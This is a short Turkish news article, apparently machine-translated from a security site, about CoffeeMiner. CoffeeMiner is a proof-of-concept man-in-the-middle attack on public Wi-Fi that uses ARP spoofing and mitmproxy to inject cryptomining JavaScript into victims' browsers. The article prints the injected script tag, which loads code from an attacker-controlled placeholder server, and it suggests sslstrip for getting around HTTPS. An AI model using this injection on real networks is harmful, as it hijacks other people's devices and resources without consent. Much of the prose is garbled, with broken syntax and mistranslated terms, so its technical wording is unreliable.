Wi-Fi Ağları ve CoffeeMiner Saldırısı

Wi-Fi Ağları ve CoffeeMiner Saldırısı

Arnau olarak bilinen bağımsız IB uzmanı, CoffeeMiner olarak adlandırılan ilginç bir kavram kanıtı ve ilgili çalışma yayınladı. Aralık 2017'de Buenos Aires'te meydana gelen olay, bu uzmanın projesinin yaratılmasına ilham verdi. Daha sonra, Starbucks kahve evlerinin yerel ağının ziyaretçilerine Wi-Fi ağına bir bağlantı sağlamasının yanı sıra, kamu ağına bağlı cihazları kullanarak kripto paralarını da gizlediği ortaya çıktı.



Arnau sadece eğitim ve araştırma amaçlı oluşturulan teorik akademik araştırma gibi CoffeeMiner kavramı ve kaynak kodu yayınlar vurgular. Saldırı esasen Arjantin'de yaşananlar tekrarlar ve orijinal saldırıyı verir man-in-the-middle. sızdırma Adres Çözümleme Protokolü (ARP) için CoffeeMiner aynı ağ içinde cihazlardan şifresiz trafiği kesmek için. aşağıdaki gibi bilinen mitmproxy aracını kullanarak korumasız trafikte Enjeksiyon için, HTML kodu görünüyor: 

<_script src=»http:_//httpserverIP:8000/script_.js» type=»text/javascript»></_script>


Bu mağdur Madencilik CPU kaynaklarını geciktirir JavaScript başlar. Bizim testlerde araştırmacılar popüler "tarayıcı" mayningovy senaryoyu Coinhive ve çıkarılan cryptocurrency Monero kullandı. 


Uzman, böyle bir saldırının kolayca otomatikleştirilebileceğini not eder. CoffeeMiner bu formu HTTPS ile çalışmak mümkün olmasa da, bu sorun sslstrip kullanarak, örneğin, çözülebilir. 


İncelemeler Aşağıda VirtualBox'ta CoffeeMiner bir gösteri görmek ve gerçek hayatta olabilir. 

https://www.youtube.com/watch?v=wmYJ6Z4LoCA 

https://www.youtube.com/watch?v=-TnzGLUD0DU



Kaynak: https://exploit.in/2018/11352/